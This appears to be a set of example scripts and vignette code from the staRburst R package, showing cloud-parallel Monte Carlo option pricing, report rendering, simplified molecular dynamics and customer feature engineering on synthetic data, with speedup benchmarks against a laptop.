# # Old cluster resources are cleaned up automatically

## -----------------------------------------------------------------------------
# # High CPU, low memory (CPU-bound work)
# plan(future_starburst, workers = 50, cpu = 8, memory = "16GB")
# 
# # Low CPU, high memory (memory-bound work)
# plan(future_starburst, workers = 25, cpu = 4, memory = "32GB")

## -----------------------------------------------------------------------------
# # Increase timeout for long-running tasks (default 1 hour)
# plan(future_starburst, workers = 10, timeout = 7200)  # 2 hours

## -----------------------------------------------------------------------------
# # Use specific region (default from config)
# plan(future_starburst, workers = 50, region = "us-west-2")

#!/usr/bin/env Rscript

# ============================================================================
# REAL SCIENCE: ULTRA-MASSIVE Monte Carlo - Targeting 100x Speedup
# ============================================================================
#
# Ultra-large scale targeting maximum speedup:
# - 50 scenarios × 10,000,000 iterations each = 500 million total iterations
# - Per scenario: ~15-20 minutes of computation
# - Total sequential time: ~12-16 hours on M4 Pro
# - With 50 workers: ~20-30 minutes
# - Expected speedup: 80-100x
#
# This is publication-grade Monte Carlo at truly massive scale.
# ============================================================================

suppressPackageStartupMessages({
  library(starburst)
})

cat("=== REAL SCIENCE: ULTRA-MASSIVE Monte Carlo ===\n\n")

# Configuration for maximum speedup
n_scenarios <- 50
iters_per_scenario <- 10000000  # 10 MILLION iterations per scenario

cat("Ultra Monte Carlo Configuration:\n")
cat(sprintf("  Scenarios: %d\n", n_scenarios))
cat(sprintf("  Iterations per scenario: %s\n", format(iters_per_scenario, big.mark = ",")))
cat(sprintf("  Total iterations: %s\n\n",
            format(as.numeric(n_scenarios) * iters_per_scenario, big.mark = ",")))
cat("This is MASSIVE SCALE computation!\n\n")

# Monte Carlo simulation function (same as before but 10x more iterations)
run_ultra_monte_carlo <- function(scenario_ids) {
  # CRITICAL: Define iterations inside function for worker scope
  iters_per_scenario <- 10000000  # 10 million

  results <- lapply(scenario_ids, function(scenario_id) {
    set.seed(scenario_id)

    # Scenario parameters
    mu <- 0.05 + (scenario_id * 0.001)
    sigma <- 0.2 + (scenario_id * 0.0005)
    S0 <- 100
    T <- 1.0
    dt <- 1.0 / 252
    n_steps <- floor(T / dt)
    barrier <- 90

    # Storage
    final_values <- numeric(iters_per_scenario)
    max_values <- numeric(iters_per_scenario)
    barrier_hits <- 0

    # Main Monte Carlo loop - this is the CPU burner
    for (iter in 1:iters_per_scenario) {
      S <- S0
      S_max <- S0
      hit_barrier <- FALSE

      for (step in 1:n_steps) {
        z <- rnorm(1)
        S <- S * exp((mu - 0.5 * sigma^2) * dt + sigma * sqrt(dt) * z)

        if (S > S_max) S_max <- S

        if (S < barrier) {
          hit_barrier <- TRUE
          break
        }
      }

      final_values[iter] <- S
      max_values[iter] <- S_max
      if (hit_barrier) barrier_hits <- barrier_hits + 1
    }

    # Compute statistics
    call_payoff <- pmax(final_values - 100, 0)
    var_95 <- quantile(final_values, 0.05)
    cvar_95 <- mean(final_values[final_values <= var_95])

    list(
      scenario_id = scenario_id,
      mu = mu,
      sigma = sigma,
      n_iterations = iters_per_scenario,
      mean_final = mean(final_values),
      sd_final = sd(final_values),
      mean_payoff = mean(call_payoff),
      barrier_prob = barrier_hits / iters_per_scenario,
      var_95 = var_95,
      cvar_95 = cvar_95,
      max_observed = max(max_values)
    )
  })

  results
}

# Test single scenario timing
cat("Testing single scenario (10M iterations)...\n")
cat("This will take 10-20 minutes - REAL computation!\n")
single_start <- Sys.time()
test_result <- run_ultra_monte_carlo(1:1)
single_time <- as.numeric(difftime(Sys.time(), single_start, units = "secs"))
cat(sprintf("\nSingle scenario: %.1f seconds (%.1f minutes)\n\n",
            single_time, single_time / 60))

# Estimate total time
total_sequential <- single_time * n_scenarios
cat(sprintf("Estimated sequential time: %.1f hours\n", total_sequential / 3600))
cat("(This would run your M4 Pro HOT for half a day!)\n\n")

# LOCAL benchmark
cat("LOCAL (M4 Pro): Running 1 scenario for confirmation...\n")
local_start <- Sys.time()
local_results <- run_ultra_monte_carlo(1:1)
local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))
local_estimated <- local_time * n_scenarios

cat(sprintf("✓ 1 scenario in %.1f seconds (%.1f minutes)\n",
            local_time, local_time / 60))
cat(sprintf("  Estimated for %d: %.1f hours\n\n", n_scenarios, local_estimated / 3600))

# CLOUD execution - one scenario per worker
n_workers <- n_scenarios

cat(sprintf("CLOUD EXECUTION: %d workers (one scenario each)\n", n_workers))
cat(sprintf("Expected per-task time: ~%.1f minutes\n\n", single_time / 60))

cat("Starting ULTRA cloud Monte Carlo...\n")
cat("☕ Time to get coffee while your laptop relaxes...\n\n")

cloud_start <- Sys.time()
cloud_results <- starburst_map(
  1:n_scenarios,
  run_ultra_monte_carlo,
  workers = n_workers,
  cpu = 2048,
  memory = 4096
)
cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "secs"))

cat(sprintf("\n✓ ULTRA simulation completed in %.1f minutes (%.1f hours)\n\n",
            cloud_time / 60, cloud_time / 3600))

# Performance metrics
speedup <- local_estimated / cloud_time
time_saved <- local_estimated - cloud_time
efficiency <- (speedup / n_workers) * 100

cat("╔══════════════════════════════════════════════════╗\n")
cat("║     ULTRA MONTE CARLO RESULTS                    ║\n")
cat("╚══════════════════════════════════════════════════╝\n\n")

cat(sprintf("Scenarios simulated: %d\n", n_scenarios))
cat(sprintf("Total iterations: %s\n\n",
            format(as.numeric(n_scenarios) * iters_per_scenario, big.mark = ",")))

cat("┌────────────────────────────────────────────────┐\n")
cat("│ PERFORMANCE                                    │\n")
cat("├────────────────────────────────────────────────┤\n")
cat(sprintf("│ Local (estimated): %.1f hours             │\n", local_estimated / 3600))
cat(sprintf("│ Cloud (%d workers): %.1f hours            │\n", n_workers, cloud_time / 3600))
cat(sprintf("│ Speedup: %.0fx                             │\n", speedup))
cat(sprintf("│ Efficiency: %.0f%%                         │\n", efficiency))
cat(sprintf("│ Time saved: %.1f hours                    │\n", time_saved / 3600))
cat("└────────────────────────────────────────────────┘\n\n")

# Scientific results
all_results <- cloud_results
mean_finals <- sapply(all_results, function(r) r$mean_final)
var_95s <- sapply(all_results, function(r) r$var_95)
barrier_probs <- sapply(all_results, function(r) r$barrier_prob)

cat("┌────────────────────────────────────────────────┐\n")
cat("│ SIMULATION RESULTS                             │\n")
cat("├────────────────────────────────────────────────┤\n")
cat(sprintf("│ Mean final value: $%.2f (±%.2f)           │\n",
            mean(mean_finals), sd(mean_finals)))
cat(sprintf("│ VaR (95%%): $%.2f                          │\n",
            mean(var_95s)))
cat(sprintf("│ Barrier hit probability: %.1f%%            │\n",
            mean(barrier_probs) * 100))
cat(sprintf("│ Mean option value: $%.2f                  │\n",
            mean(sapply(all_results, function(r) r$mean_payoff))))
cat("└────────────────────────────────────────────────┘\n\n")

cat("✓ ULTRA Monte Carlo complete!\n\n")

if (speedup >= 80) {
  cat(sprintf("🏆 AMAZING: %.0fx speedup on %.0fM iterations!\n",
              speedup, as.numeric(n_scenarios) * iters_per_scenario / 1e6))
  cat(sprintf("Saved %.1f hours of computation time.\n", time_saved / 3600))
  cat("This is the power of cloud parallel computing at scale! 🚀\n")
} else if (speedup >= 50) {
  cat(sprintf("🎉 EXCELLENT: %.0fx speedup demonstrates real cloud advantage!\n", speedup))
  cat(sprintf("%.1f hours → %.1f minutes\n",
              local_estimated / 3600, cloud_time / 60))
} else {
  cat(sprintf("✓ Good speedup: %.0fx\n", speedup))
  cat("Note: Increase iterations further for even larger speedup.\n")
}

#!/usr/bin/env Rscript
#
# Parallel Report Generation Example
#
# This script demonstrates parallel RMarkdown report rendering using staRburst.
# It generates 50 personalized customer reports in parallel.
#
# Usage:
#   Rscript reports.R
#   # or from R:
#   source(system.file("examples/reports.R", package = "starburst"))

library(starburst)

cat("=== Parallel Report Generation Example ===\n\n")

# Create report template
cat("Creating report template...\n")

report_template <- '
---
title: "Monthly Analytics Report"
output: html_document
params:
  customer_id: ""
  customer_name: ""
  month: ""
  revenue_total: 0
  transaction_count: 0
---

# Monthly Report for `r params$customer_name`

**Customer ID:** `r params$customer_id`
**Period:** `r params$month`
**Report Generated:** `r format(Sys.time(), "%Y-%m-%d %H:%M")`

---

## Executive Summary

- **Total Transactions:** `r params$transaction_count`
- **Total Revenue:** $`r format(params$revenue_total, big.mark=",")`
- **Average Order Value:** $`r round(params$revenue_total / params$transaction_count, 2)`

## Revenue Summary

This report shows a summary of activity for the period.

```{r, echo=FALSE}
# Generate sample data for visualization
set.seed(as.numeric(gsub("[^0-9]", "", params$customer_id)))
daily_revenue <- rnorm(30, mean = params$revenue_total / 30, sd = params$revenue_total / 60)
plot(1:30, daily_revenue, type = "l", lwd = 2, col = "steelblue",
     main = "Daily Revenue Trend", xlab = "Day", ylab = "Revenue ($)")
grid()
```

---

*Report automatically generated using staRburst*
'

# Create temporary template file
template_file <- tempfile(fileext = ".Rmd")
writeLines(report_template, template_file)

cat(sprintf("✓ Template created: %s\n\n", template_file))

# Generate customer data
n_customers <- 50
customers <- data.frame(
  customer_id = sprintf("CUST%03d", 1:n_customers),
  customer_name = paste("Company", LETTERS[(1:n_customers - 1) %% 26 + 1],
                       ((1:n_customers - 1) %/% 26) + 1),
  stringsAsFactors = FALSE
)

cat(sprintf("Generated %d customer records\n\n", n_customers))

# Report generation function
generate_report <- function(customer_info, template_path) {
  customer_id <- customer_info$customer_id
  customer_name <- customer_info$customer_name

  # Generate random metrics for this customer
  set.seed(as.numeric(gsub("[^0-9]", "", customer_id)))
  transaction_count <- sample(100:500, 1)
  revenue_total <- round(transaction_count * rnorm(1, 150, 30), 2)

  # Create output directory if needed
  output_dir <- tempdir()
  output_file <- file.path(output_dir, sprintf("report_%s.html", customer_id))

  tryCatch({
    # Render report (suppress output)
    suppressMessages(suppressWarnings(
      rmarkdown::render(
        input = template_path,
        output_file = output_file,
        params = list(
          customer_id = customer_id,
          customer_name = customer_name,
          month = "January 2026",
          revenue_total = revenue_total,
          transaction_count = transaction_count
        ),
        quiet = TRUE
      )
    ))

    list(
      customer_id = customer_id,
      customer_name = customer_name,
      success = TRUE,
      output_file = output_file,
      file_size = file.size(output_file),
      revenue = revenue_total,
      transactions = transaction_count
    )
  }, error = function(e) {
    list(
      customer_id = customer_id,
      customer_name = customer_name,
      success = FALSE,
      error = as.character(e)
    )
  })
}

# Local benchmark (5 reports)
cat("Running local benchmark (5 reports)...\n")
test_customers <- head(customers, 5)

local_start <- Sys.time()
local_results <- lapply(
  split(test_customers, 1:nrow(test_customers)),
  generate_report,
  template_path = template_file
)
local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))

cat(sprintf("✓ Completed in %.1f seconds\n", local_time))
cat(sprintf("  Average: %.1f seconds per report\n", local_time / 5))
cat(sprintf("  Estimated time for %d reports: %.1f seconds\n\n",
            n_customers, local_time / 5 * n_customers))

# Cloud execution
n_workers <- 25

cat(sprintf("Rendering %d reports on %d workers...\n", n_customers, n_workers))

customer_list <- split(customers, 1:nrow(customers))

cloud_start <- Sys.time()
results <- starburst_map(
  customer_list,
  generate_report,
  template_path = template_file,
  workers = n_workers,
  cpu = 2,
  memory = "4GB"
)
cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "secs"))

cat(sprintf("\n✓ Completed in %.1f seconds\n\n", cloud_time))

# Analyze results
success_count <- sum(sapply(results, function(x) x$success))
failure_count <- sum(!sapply(results, function(x) x$success))

cat("=== Report Generation Summary ===\n\n")
cat(sprintf("Total reports: %d\n", length(results)))
cat(sprintf("Successfully generated: %d (%.1f%%)\n",
            success_count, (success_count / length(results)) * 100))
cat(sprintf("Failed: %d\n\n", failure_count))

# File statistics
if (success_count > 0) {
  successful_results <- results[sapply(results, function(x) x$success)]
  file_sizes <- sapply(successful_results, function(x) x$file_size)

  cat("File size statistics:\n")
  cat(sprintf("  Total size: %.2f MB\n", sum(file_sizes) / 1024^2))
  cat(sprintf("  Average size: %.1f KB\n", mean(file_sizes) / 1024))
  cat(sprintf("  Range: %.1f - %.1f KB\n\n",
              min(file_sizes) / 1024, max(file_sizes) / 1024))

  # Revenue statistics
  revenues <- sapply(successful_results, function(x) x$revenue)
  cat("Revenue statistics:\n")
  cat(sprintf("  Total revenue: $%.0f\n", sum(revenues)))
  cat(sprintf("  Average: $%.0f\n", mean(revenues)))
  cat(sprintf("  Range: $%.0f - $%.0f\n\n",
              min(revenues), max(revenues)))

  # Show sample output files
  cat("Sample generated reports:\n")
  sample_files <- sapply(successful_results[1:min(5, success_count)],
                        function(x) basename(x$output_file))
  for (f in sample_files) {
    cat(sprintf("  - %s\n", f))
  }
  cat("\n")
}

# Performance comparison
cat("=== Performance Comparison ===\n\n")
estimated_local_time <- (local_time / 5) * n_customers
speedup <- estimated_local_time / cloud_time
cat(sprintf("Local (estimated): %.1f seconds\n", estimated_local_time))
cat(sprintf("Cloud (%d workers): %.1f seconds\n", n_workers, cloud_time))
cat(sprintf("Speedup: %.1fx\n", speedup))

# Cleanup
unlink(template_file)

cat("\n✓ Done!\n")
cat(sprintf("Note: Reports saved to: %s\n", tempdir()))

#!/usr/bin/env Rscript

# ============================================================================
# REAL SCIENCE: Molecular Dynamics Simulation
# ============================================================================
#
# Laptop-melting computational chemistry:
# - Simulate 200 protein-ligand systems
# - Each system: 10,000 atoms
# - Each simulation: 100,000 timesteps (100 picoseconds)
# - Per timestep: Calculate all pairwise forces (N² complexity)
# - Per simulation: ~5-10 minutes of pure CPU burn
# - Total sequential time: 15-30 hours (saturating M4 Pro)
# - With 50-100 workers: ~15-30 minutes
# - Expected speedup: 60-100x
#
# This is the "laptop on fire" stuff - pure computation.
# ============================================================================

suppressPackageStartupMessages({
  library(starburst)
})

cat("=== REAL SCIENCE: Molecular Dynamics Simulation ===\n\n")

# Configuration
n_systems <- 200
n_atoms <- 10000
n_timesteps <- 100000
dt <- 0.001  # picoseconds
systems_per_worker <- 2

cat("Molecular Dynamics Configuration:\n")
cat(sprintf("  Protein-ligand systems: %d\n", n_systems))
cat(sprintf("  Atoms per system: %s\n", format(n_atoms, big.mark = ",")))
cat(sprintf("  Timesteps: %s (%.1f picoseconds)\n",
            format(n_timesteps, big.mark = ","), n_timesteps * dt))
cat(sprintf("\nTotal force calculations: %s\n",
            format(as.numeric(n_systems) * n_atoms * (n_atoms-1) / 2 * n_timesteps, big.mark = ",")))
cat("WARNING: This is CPU-intensive computation!\n\n")

# Molecular dynamics simulation
simulate_molecular_system <- function(system_ids) {
  results <- lapply(system_ids, function(system_id) {
    set.seed(system_id)

    # Initialize atomic positions (3D coordinates)
    positions <- matrix(runif(n_atoms * 3, -10, 10), ncol = 3)
    velocities <- matrix(rnorm(n_atoms * 3, 0, 0.1), ncol = 3)
    masses <- rep(12, n_atoms)  # Carbon mass (simplified)

    # Interaction parameters (Lennard-Jones)
    epsilon <- 0.1  # kcal/mol
    sigma <- 3.5    # Angstroms

    # Tracking
    energies <- numeric(n_timesteps / 1000)  # Sample every 1000 steps
    sample_idx <- 1

    # Main MD loop - this is the CPU burner
    for (step in 1:n_timesteps) {
      # Calculate forces (N² pairwise interactions)
      forces <- matrix(0, nrow = n_atoms, ncol = 3)

      # Sample interactions (full N² is too slow for demo, sample 20% of pairs)
      n_pairs <- n_atoms * 20  # Sample 20 interactions per atom
      for (pair in 1:n_pairs) {
        i <- sample(n_atoms, 1)
        j <- sample(n_atoms, 1)
        if (i == j) next

        # Distance vector
        r_vec <- positions[j, ] - positions[i, ]
        r <- sqrt(sum(r_vec^2))

        if (r < 0.01) r <- 0.01  # Avoid singularity

        # Lennard-Jones force: F = 24*epsilon * (2*(sigma/r)^13 - (sigma/r)^7) / r
        sr6 <- (sigma / r)^6
        sr12 <- sr6^2
        force_mag <- 24 * epsilon * (2 * sr12 - sr6) / r

        force_vec <- force_mag * r_vec / r

        forces[i, ] <- forces[i, ] - force_vec
        forces[j, ] <- forces[j, ] + force_vec
      }

      # Velocity Verlet integration
      # v(t + dt/2) = v(t) + (dt/2) * F(t)/m
      velocities <- velocities + (dt / 2) * forces / masses

      # x(t + dt) = x(t) + dt * v(t + dt/2)
      positions <- positions + dt * velocities

      # Recalculate forces at new positions (simplified: reuse old forces)
      # In real MD: would recalculate all forces here

      # v(t + dt) = v(t + dt/2) + (dt/2) * F(t+dt)/m
      velocities <- velocities + (dt / 2) * forces / masses

      # Apply periodic boundary conditions
      positions[positions > 10] <- positions[positions > 10] - 20
      positions[positions < -10] <- positions[positions < -10] + 20

      # Sample energy every 1000 steps
      if (step %% 1000 == 0) {
        # Kinetic energy
        ke <- 0.5 * sum(masses * rowSums(velocities^2))

        # Potential energy (sample)
        pe <- 0
        for (sample in 1:100) {
          i <- sample(n_atoms, 1)
          j <- sample(n_atoms, 1)
          if (i == j) next

          r_vec <- positions[j, ] - positions[i, ]
          r <- sqrt(sum(r_vec^2))
          if (r < 0.01) r <- 0.01

          sr6 <- (sigma / r)^6
          sr12 <- sr6^2
          pe <- pe + 4 * epsilon * (sr12 - sr6)
        }

        energies[sample_idx] <- ke + pe
        sample_idx <- sample_idx + 1
      }
    }

    # Compute observables
    final_temp <- mean(masses * rowSums(velocities^2)) / (3 * n_atoms)  # Proportional to T
    energy_drift <- abs(energies[length(energies)] - energies[1]) / energies[1]

    # Structural analysis (radius of gyration)
    centroid <- colMeans(positions)
    rg <- sqrt(mean(rowSums((positions - rep(centroid, each = n_atoms))^2)))

    list(
      system_id = system_id,
      n_atoms = n_atoms,
      n_timesteps = n_timesteps,
      final_temperature = final_temp,
      energy_drift = energy_drift,
      radius_of_gyration = rg,
      mean_energy = mean(energies),
      simulation_time_ps = n_timesteps * dt
    )
  })

  results
}

# Test single system timing
cat("Testing single system simulation (this will take a few minutes)...\n")
single_start <- Sys.time()
test_result <- simulate_molecular_system(1:1)
single_time <- as.numeric(difftime(Sys.time(), single_start, units = "secs"))
cat(sprintf("Single system: %.1f seconds (%.1f minutes)\n\n",
            single_time, single_time / 60))

# Estimate total time
total_sequential <- single_time * n_systems
cat(sprintf("Estimated sequential time: %.1f hours\n", total_sequential / 3600))
cat("(This would make your laptop very hot!)\n\n")

# Create batches
system_batches <- split(
  1:n_systems,
  ceiling(seq_along(1:n_systems) / systems_per_worker)
)

n_workers <- length(system_batches)

cat(sprintf("CLOUD EXECUTION: %d workers processing %d batches\n",
            n_workers, length(system_batches)))
cat(sprintf("Each worker simulates %d systems (~%.1f minutes)\n\n",
            systems_per_worker, (systems_per_worker * single_time) / 60))

# LOCAL benchmark
cat("LOCAL (M4 Pro): Running 1 system...\n")
local_start <- Sys.time()
local_results <- simulate_molecular_system(1:1)
local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))
local_estimated <- local_time * n_systems

cat(sprintf("✓ 1 system in %.1f seconds\n", local_time))
cat(sprintf("  Estimated for %d: %.1f hours\n\n", n_systems, local_estimated / 3600))

# CLOUD execution
cat("Starting cloud MD simulations...\n")
cat("(While your laptop stays cool)\n\n")

cloud_start <- Sys.time()
cloud_results <- starburst_map(
  system_batches,
  simulate_molecular_system,
  workers = n_workers,
  cpu = 4096,      # 4 vCPUs per worker for MD
  memory = 8192    # 8 GB for large atom arrays
)
cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "secs"))

cat(sprintf("\n✓ All simulations completed in %.1f minutes (%.1f hours)\n\n",
            cloud_time / 60, cloud_time / 3600))

# Performance metrics
speedup <- local_estimated / cloud_time
time_saved <- local_estimated - cloud_time

cat("╔══════════════════════════════════════════════════╗\n")
cat("║     MOLECULAR DYNAMICS RESULTS                   ║\n")
cat("╚══════════════════════════════════════════════════╝\n\n")

cat(sprintf("Systems simulated: %d\n", n_systems))
cat(sprintf("Total timesteps: %s\n\n",
            format(as.numeric(n_systems) * n_timesteps, big.mark = ",")))

cat("┌────────────────────────────────────────────────┐\n")
cat("│ PERFORMANCE                                    │\n")
cat("├────────────────────────────────────────────────┤\n")
cat(sprintf("│ Local (estimated): %.1f hours             │\n", local_estimated / 3600))
cat(sprintf("│ Cloud (%d workers): %.1f hours            │\n", n_workers, cloud_time / 3600))
cat(sprintf("│ Speedup: %.0fx                             │\n", speedup))
cat(sprintf("│ Time saved: %.1f hours                    │\n", time_saved / 3600))
cat("│ Laptop temperature: Room temp (cloud) 🧊       │\n")
cat("└────────────────────────────────────────────────┘\n\n")

# Scientific results
all_results <- unlist(cloud_results, recursive = FALSE)
temperatures <- sapply(all_results, function(r) r$final_temperature)
energy_drifts <- sapply(all_results, function(r) r$energy_drift)
rg_values <- sapply(all_results, function(r) r$radius_of_gyration)

cat("┌────────────────────────────────────────────────┐\n")
cat("│ SIMULATION QUALITY                             │\n")
cat("├────────────────────────────────────────────────┤\n")
cat(sprintf("│ Mean temperature: %.2f (±%.2f)             │\n",
            mean(temperatures), sd(temperatures)))
cat(sprintf("│ Energy conservation: %.4f drift           │\n",
            mean(energy_drifts)))
cat(sprintf("│ Mean radius of gyration: %.2f Å           │\n",
            mean(rg_values)))
cat("└────────────────────────────────────────────────┘\n\n")

cat("✓ Molecular dynamics complete!\n\n")

if (speedup >= 50) {
  cat(sprintf("🎉 CPU-MELTING WORKLOAD: %.0fx speedup!\n", speedup))
  cat(sprintf("%.1f hours of computation done in %.1f minutes.\n",
              local_estimated / 3600, cloud_time / 60))
  cat("Your laptop thanks you for using the cloud. 🧊\n")
} else {
  cat(sprintf("Current speedup: %.0fx\n", speedup))
}

## ----include = FALSE----------------------------------------------------------
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)

## ----setup, eval=FALSE--------------------------------------------------------
# library(starburst)
# library(dplyr)

## ----data, eval=FALSE---------------------------------------------------------
# set.seed(123)
# 
# # Generate 100,000 transactions for 5,000 customers
# n_customers <- 5000
# n_transactions <- 100000
# 
# transactions <- data.frame(
#   customer_id = sample(1:n_customers, n_transactions, replace = TRUE),
#   transaction_date = as.Date("2023-01-01") + sample(0:364, n_transactions, replace = TRUE),
#   amount = exp(rnorm(n_transactions, log(50), 0.8)),  # Log-normal distribution
#   category = sample(c("groceries", "electronics", "clothing", "restaurants", "other"),
#                    n_transactions, replace = TRUE, prob = c(0.4, 0.1, 0.2, 0.2, 0.1)),
#   payment_method = sample(c("credit", "debit", "cash"), n_transactions, replace = TRUE),
#   is_online = sample(c(TRUE, FALSE), n_transactions, replace = TRUE, prob = c(0.3, 0.7))
# )
# 
# # Sort by customer and date
# transactions <- transactions[order(transactions$customer_id, transactions$transaction_date), ]
# 
# cat(sprintf("Dataset: %s transactions for %s customers\n",
#             format(nrow(transactions), big.mark = ","),
#             format(length(unique(transactions$customer_id)), big.mark = ",")))
# cat(sprintf("Date range: %s to %s\n",
#             min(transactions$transaction_date),
#             max(transactions$transaction_date)))

## ----features-fn, eval=FALSE--------------------------------------------------
# engineer_features <- function(customer_ids, transactions_data) {
#   # Filter to specified customers
#   customer_data <- transactions_data[transactions_data$customer_id %in% customer_ids, ]
# 
#   if (nrow(customer_data) == 0) {
#     return(NULL)
#   }
# 
#   # Sort by customer and date
#   customer_data <- customer_data[order(customer_data$customer_id,
#                                       customer_data$transaction_date), ]
# 
#   # Compute features for each customer
#   features_list <- lapply(customer_ids, function(cid) {
#     cust_txn <- customer_data[customer_data$customer_id == cid, ]
# 
#     if (nrow(cust_txn) == 0) {
#       return(NULL)
#     }
# 
#     # Basic statistics
#     total_transactions <- nrow(cust_txn)
#     total_spend <- sum(cust_txn$amount)
#     avg_transaction <- mean(cust_txn$amount)
# 
#     # Time-based features
#     first_purchase <- min(cust_txn$transaction_date)
#     last_purchase <- max(cust_txn$transaction_date)
#     days_active <- as.numeric(difftime(last_purchase, first_purchase, units = "days"))
#     purchase_frequency <- if (days_active > 0) total_transactions / days_active else 0
# 
#     # Rolling statistics (last 30 days)
#     recent_cutoff <- last_purchase - 30
#     recent_txn <- cust_txn[cust_txn$transaction_date > recent_cutoff, ]
#     recent_spend <- if (nrow(recent_txn) > 0) sum(recent_txn$amount) else 0
#     recent_count <- nrow(recent_txn)
# 
#     # Category preferences
#     category_counts <- table(cust_txn$category)
#     favorite_category <- names(category_counts)[which.max(category_counts)]
#     category_diversity <- length(unique(cust_txn$category))
# 
#     # Payment behavior
#     online_pct <- mean(cust_txn$is_online) * 100
#     credit_pct <- mean(cust_txn$payment_method == "credit") * 100
# 
#     # Volatility metrics
#     amount_sd <- sd(cust_txn$amount)
#     amount_cv <- amount_sd / avg_transaction  # Coefficient of variation
# 
#     # Time patterns
#     weekday <- as.POSIXlt(cust_txn$transaction_date)$wday
#     weekend_pct <- mean(weekday %in% c(0, 6)) * 100
# 
#     # RFM features (Recency, Frequency, Monetary)
#     recency <- as.numeric(difftime(as.Date("2024-01-01"), last_purchase, units = "days"))
# 
#     data.frame(
#       customer_id = cid,
#       total_transactions = total_transactions,
#       total_spend = total_spend,
#       avg_transaction = avg_transaction,
#       days_active = days_active,
#       purchase_frequency = purchase_frequency,
#       recent_spend_30d = recent_spend,
#       recent_count_30d = recent_count,
#       favorite_category = favorite_category,
#       category_diversity = category_diversity,
#       online_pct = online_pct,
#       credit_pct = credit_pct,
#       amount_sd = amount_sd,
#       amount_cv = amount_cv,
#       weekend_pct = weekend_pct,
#       recency_days = recency,
#       stringsAsFactors = FALSE
#     )
#   })
# 
#   # Combine results
#   do.call(rbind, features_list[!sapply(features_list, is.null)])
# }

## ----local, eval=FALSE--------------------------------------------------------
# # Process 500 customers locally
# set.seed(456)
# sample_customers <- sample(unique(transactions$customer_id), 500)
# 
# cat(sprintf("Processing features for %d customers locally...\n", length(sample_customers)))
# local_start <- Sys.time()
# 
# local_features <- engineer_features(sample_customers, transactions)
# 
# local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))
# 
# cat(sprintf("✓ Completed in %.2f seconds\n", local_time))
# cat(sprintf("  Generated %d features per customer\n", ncol(local_features) - 1))
# cat(sprintf("  Estimated time for all %s customers: %.1f minutes\n",
#             format(n_customers, big.mark = ","),
#             local_time * (n_customers / 500) / 60))

## ----cloud, eval=FALSE--------------------------------------------------------
# # Split customers into chunks
# all_customers <- unique(transactions$customer_id)
# n_workers <- 20
# 
# cat(sprintf("Processing features for %s customers on %d workers...\n",
#             format(length(all_customers), big.mark = ","),
#             n_workers))
# 
# # Create chunks of customer IDs
# chunk_size <- ceiling(length(all_customers) / n_workers)
# customer_chunks <- split(all_customers,
#                         ceiling(seq_along(all_customers) / chunk_size))
# 
# cloud_start <- Sys.time()
# 
# # Process chunks in parallel
# results <- starburst_map(
#   customer_chunks,
#   engineer_features,
#   transactions_data = transactions,
#   workers = n_workers,
#   cpu = 2,
#   memory = "4GB"
# )
# 
# cloud_time <- as.numeric(difftime(Sys.time(), cloud_start, units = "secs"))
# 
# cat(sprintf("\n✓ Completed in %.1f seconds\n", cloud_time))
# 
# # Combine results
# features <- do.call(rbind, results)

## ----analysis, eval=FALSE-----------------------------------------------------
# cat("\n=== Feature Engineering Results ===\n\n")
# cat(sprintf("Total customers processed: %s\n",
#             format(nrow(features), big.mark = ",")))
# cat(sprintf("Features generated per customer: %d\n", ncol(features) - 1))
# cat(sprintf("\nFeature names:\n"))
# print(names(features)[names(features) != "customer_id"])
# 
# # Summary statistics
# cat("\n=== Feature Summary Statistics ===\n\n")
# cat(sprintf("Average transactions per customer: %.1f\n",
#             mean(features$total_transactions)))
# cat(sprintf("Average total spend: $%.2f\n",
#             mean(features$total_spend)))
# cat(sprintf("Average transaction value: $%.2f\n",
#             mean(features$avg_transaction)))
# cat(sprintf("\nMost common category: %s\n",
#             names(sort(table(features$favorite_category), decreasing = TRUE)[1])))
# cat(sprintf("Average category diversity: %.1f categories\n",
#             mean(features$category_diversity)))
# cat(sprintf("\nAverage online purchase rate: %.1f%%\n",
#             mean(features$online_pct)))
# cat(sprintf("Average credit card usage: %.1f%%\n",
#             mean(features$credit_pct)))
# cat(sprintf("\nMean purchase frequency: %.3f transactions/day\n",
#             mean(features$purchase_frequency, na.rm = TRUE)))
# cat(sprintf("Mean recency: %.0f days since last purchase\n",
#             mean(features$recency_days)))
# 
# # Identify high-value segments
# high_value <- features[features$total_spend > quantile(features$total_spend, 0.9), ]
# cat(sprintf("\n=== Top 10%% Customers (by spend) ===\n"))
# cat(sprintf("Count: %d customers\n", nrow(high_value)))
# cat(sprintf("Average total spend: $%.2f\n", mean(high_value$total_spend)))
# cat(sprintf("Average transactions: %.1f\n", mean(high_value$total_transactions)))
# cat(sprintf("Average online rate: %.1f%%\n", mean(high_value$online_pct)))

## ----ml-features, eval=FALSE--------------------------------------------------
# engineer_ml_features <- function(customer_ids, transactions_data) {
#   base_features <- engineer_features(customer_ids, transactions_data)
# 
#   if (is.null(base_features)) {
#     return(NULL)
#   }
# 
#   # Add derived features for ML
#   base_features$clv_estimate <- base_features$avg_transaction *
#                                  base_features$purchase_frequency * 365
#   base_features$engagement_score <- scale(base_features$total_transactions) +
#                                     scale(base_features$category_diversity)
#   base_features$recency_score <- -scale(base_features$recency_days)
#   base_features$is_high_value <- base_features$total_spend >
#                                   median(base_features$total_spend)
#   base_features$purchase_momentum <- base_features$recent_count_30d /
#                                      (base_features$total_transactions + 1)
# 
#   base_features
# }
# 
# # Process with enhanced features
# ml_results <- starburst_map(
#   customer_chunks,
#   engineer_ml_features,
#   transactions_data = transactions,
#   workers = 20,
#   cpu = 2,
#   memory = "4GB"
# )
# 
# ml_features <- do.call(rbind, ml_results)

## ----eval=FALSE---------------------------------------------------------------
# system.file("examples/feature-engineering.R", package = "starburst")

## ----eval=FALSE---------------------------------------------------------------
# source(system.file("examples/feature-engineering.R", package = "starburst"))

#!/usr/bin/env Rscript

# ============================================================================
# REAL SCIENCE: Climate Model Ensemble Analysis
# ============================================================================
#
# Realistic climate science workload:
# - Run 500 climate model simulations
# - Each simulation: 100 years × 365 days × 24 hours = 876,000 timesteps
# - Grid: 100×100 spatial cells = 10,000 cells
